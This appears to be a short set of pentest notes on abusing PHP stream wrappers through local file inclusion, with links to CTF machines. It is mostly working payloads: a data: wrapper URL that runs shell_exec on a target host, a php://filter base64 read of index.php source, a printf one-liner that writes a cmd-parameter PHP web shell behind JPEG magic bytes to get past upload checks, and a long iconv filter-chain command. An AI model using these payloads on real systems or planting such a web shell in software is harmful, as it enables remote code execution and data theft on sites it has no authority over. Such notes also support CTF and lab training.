Wrappers
data
Represent a string on the web page
1
http://10.11.0.22/menu.php?file=data:text/plain,hello world
1
http://10.11.0.22/menu.php?file=data:text/plain,<?php echo shell_exec("dir") ?>
php://filter
Read file with base64 encode:
1
php://filter/convert.base64-encode/resource=index.php
Examples: [[StreamIO#^c6abe1]] [[StreamIO#^56bdc2]] [[StreamIO#^2912d9]] [[StreamIO#^6f66d1]]
Bypassing restrictions
Using magic number to bypass jpeg restriction:
1
printf '\xff\xd8\xff<?=`{$_GET["cmd"]}`;>' > sploit.php
Examples: ECHO CTF Cupidme
PHP FILTER CHAIN GENERATOR
An excellent option to create a wrapper is by appending encoding wrappers for every character, this can be done with php_filter_chain_generator:
1
2
$ php -r "echo file_get_contents('php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|/resource=php://temp');"
cwwwwcGyQpQw+-AD0APQ+-AD0APQ+-AD0APQ+-AD0APQ+-AD0APQ+-AD0APQ+AD0APQ-